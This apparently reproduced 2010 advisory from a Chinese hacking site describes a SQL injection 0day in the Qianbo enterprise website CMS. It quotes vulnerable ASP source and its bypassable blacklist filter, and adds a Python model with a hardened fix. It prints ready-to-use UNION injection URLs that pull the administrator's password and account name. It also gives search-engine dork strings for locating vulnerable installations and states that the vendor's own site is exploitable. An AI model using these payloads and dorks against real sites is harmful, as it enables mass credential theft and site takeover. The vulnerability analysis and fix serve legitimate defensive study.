Qianbo Enterprise Website Management System 0day vulnerability warning - Heiba Security Net (myhack58)

2010-04-20T00:00:00
ID MYHACK58:62201026766
Type myhack58
Reporter Anonymous (佚名)
Modified 2010-04-20T00:00:00

Description

The program ships with anti-injection code in the file NoSql.asp:

<%
If EnableStopInjection = True Then
    Dim Fy_Post, Fy_Get, Fy_In, Fy_Inf, Fy_Xh, Fy_db, Fy_dbstr
    Fy_In = "'|;|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare"
    Fy_Inf = Split(Fy_In, "|")

    ' Every POST field is lowercased and checked for each blacklist token as a substring
    If Request.Form <> "" Then
        For Each Fy_Post In Request.Form
            For Fy_Xh = 0 To UBound(Fy_Inf)
                If InStr(LCase(Request.Form(Fy_Post)), Fy_Inf(Fy_Xh)) <> 0 Then
                    Response.Write "<Script Language='JavaScript'>alert('Warning: illegal parameter!');</Script>"
                    Response.End
                End If
            Next
        Next
    End If

    ' Same check for every GET parameter; Request.Cookies is never inspected
    If Request.QueryString <> "" Then
        For Each Fy_Get In Request.QueryString
            For Fy_Xh = 0 To UBound(Fy_Inf)
                If InStr(LCase(Request.QueryString(Fy_Get)), Fy_Inf(Fy_Xh)) <> 0 Then
                    Response.Write "<Script Language='JavaScript'>alert('Warning: illegal parameter!');</Script>"
                    Response.End
                End If
            Next
        Next
    End If
End If
%>

Cookies are not filtered at all, but the program restricts the variables it passes through that route to integer type, so there is nothing to be done there.

Keep looking.

The file MemberLogin.asp:

Dim LoginName, LoginPassword, VerifyCode, MemName, Password, GroupID, GroupName, Working, rs, sql
LoginName = Trim(request.Form("LoginName"))
LoginPassword = Md5(request.Form("LoginPassword"))
Set rs = server.CreateObject("adodb.recordset")
' LoginName goes into the query inside single quotes without any filtering
sql = "select * from Qianbo_Members where MemName='" & LoginName & "'"

The anti-injection code is not included here either, but this is only the login verification page; if the backend is an MSSQL database we can still do a few things with it.

Then, in HitCount.asp, I found that this file does not call the anti-injection code at all:

<%
Dim rs, m_SQL
Dim m_id
' ReplaceBadChar strips a few characters but leaves the values as free text
m_id = ReplaceBadChar(Request.QueryString("id"))
m_LX = ReplaceBadChar(Request.QueryString("LX"))
action = ReplaceBadChar(Request.QueryString("action"))
If action = "count" Then
    ' Table name (LX) and id are both concatenated straight into the UPDATE
    conn.Execute("update " & m_LX & " set ClickNumber = ClickNumber + 1 where ID=" & m_id & "")
Else
    ' Same for the SELECT; the id is not quoted, so no quote character is needed to inject
    m_SQL = "select ClickNumber from " & m_LX & " where ID=" & m_id
    Set rs = conn.Execute(m_SQL)
    response.Write "document.write(" & rs(0) & ");"
    rs.Close
    Set rs = Nothing
End If
%>

That is the file. Both lx and id are concatenated into the query unquoted, so the injection needs no quote character and ReplaceBadChar does not get in the way. The original SELECT returns a single column (ClickNumber), so the UNION must also return exactly one column, and the "and 1=2" empties the first result set so that rs(0) is the first row of the union; the value is then echoed inside document.write(...) in the response body. We construct the injection as follows:

http://127.0.0.1/hitcount.asp?lx=Qianbo_about&id=1%20and%201=2%20union%20select%20password%20from%20qianbo_admin

returns the administrator password, and

http://127.0.0.1/hitcount.asp?lx=Qianbo_about&id=1%20and%201=2%20union%20select%20adminname%20from%20qianbo_admin

returns the administrator account name.
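The following is an added example, not code from the advisory or from the Qianbo product: a Python model of the HitCount.asp query construction that shows the injected id above reaching the database, that the NoSql.asp blacklist would have stopped this exact value (and harmless ones like "Sandra") had HitCount.asp called it, and a hardened version with an allow-listed table name, an integer-parsed id and a bound parameter. Everything not in the advisory is an assumption: sqlite3 stands in for the Access/MSSQL backend, the table rows and the sample hash are constructed, and ReplaceBadChar(), whose body the advisory does not show, is modelled as stripping only quotes and angle brackets.

```python
import sqlite3

# Blacklist exactly as listed in NoSql.asp. The ASP code lowercases the value and does a
# substring search for every token, so "Sandra" is an "illegal parameter" as well.
FY_IN = "'|;|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare"
FY_INF = FY_IN.split("|")

# URL-decoded id parameter from the advisory's request.
INJECTED_ID = "1 and 1=2 union select password from qianbo_admin"

# Constructed sample value: md5("admin"). Not taken from any real install.
SAMPLE_ADMIN_HASH = "21232f297a57a5a743894a0e4a801fc3"


def nosql_blocks(value: str) -> bool:
    """True if NoSql.asp would stop a request carrying this parameter value."""
    low = value.lower()
    return any(token in low for token in FY_INF)


def replace_bad_char(value: str) -> str:
    """Stand-in for the unseen ReplaceBadChar(): ASSUMED to strip ' " < > and nothing else."""
    return value.translate(str.maketrans("", "", "'\"<>"))


def setup_db() -> sqlite3.Connection:
    """Constructed sample schema: one content table with a hit counter plus the admin table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE Qianbo_about (ID INTEGER, ClickNumber INTEGER);
        INSERT INTO Qianbo_about VALUES (1, 41);
        CREATE TABLE qianbo_admin (adminname TEXT, password TEXT);
        INSERT INTO qianbo_admin VALUES ('admin', '%s');
        """
        % SAMPLE_ADMIN_HASH
    )
    return conn


def hitcount_vulnerable(conn: sqlite3.Connection, lx: str, m_id: str):
    """Mirrors the Else branch of HitCount.asp: table name and id are concatenated into SQL text."""
    lx = replace_bad_char(lx)
    m_id = replace_bad_char(m_id)
    m_sql = "select ClickNumber from " + lx + " where ID=" + m_id
    row = conn.execute(m_sql).fetchone()
    return row[0] if row else None  # this is what ends up inside document.write(...)


# Assumed allow-list of tables that carry a ClickNumber column; an identifier cannot be bound
# as a query parameter, so it has to be validated against a fixed set instead.
ALLOWED_TABLES = {"Qianbo_about"}


def hitcount_hardened(conn: sqlite3.Connection, lx: str, m_id: str):
    """Returns the counter, or None when the request should be rejected with a 4xx."""
    if lx not in ALLOWED_TABLES:
        return None
    try:
        id_int = int(m_id)  # "1 and 1=2 union ..." fails here
    except ValueError:
        return None
    row = conn.execute("select ClickNumber from " + lx + " where ID=?", (id_int,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = setup_db()
    print("NoSql.asp would block payload:", nosql_blocks(INJECTED_ID))
    print("NoSql.asp would block 'Sandra':", nosql_blocks("Sandra"))
    print("vulnerable, id=1:", hitcount_vulnerable(db, "Qianbo_about", "1"))
    print("vulnerable, injected id:", hitcount_vulnerable(db, "Qianbo_about", INJECTED_ID))
    print("hardened, injected id:", hitcount_hardened(db, "Qianbo_about", INJECTED_ID))
```

The count branch of HitCount.asp builds its UPDATE the same way, so the same two fixes apply there; on MSSQL that branch additionally allows stacked statements, which the SELECT model above does not show.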

Search keywords for finding installations:

inurl:Search.Asp?Range=Product&Keyword=
inurl:ProductBuy.Asp?ProductNo=

The vendor's official website has the same problem; the exploit works across the board.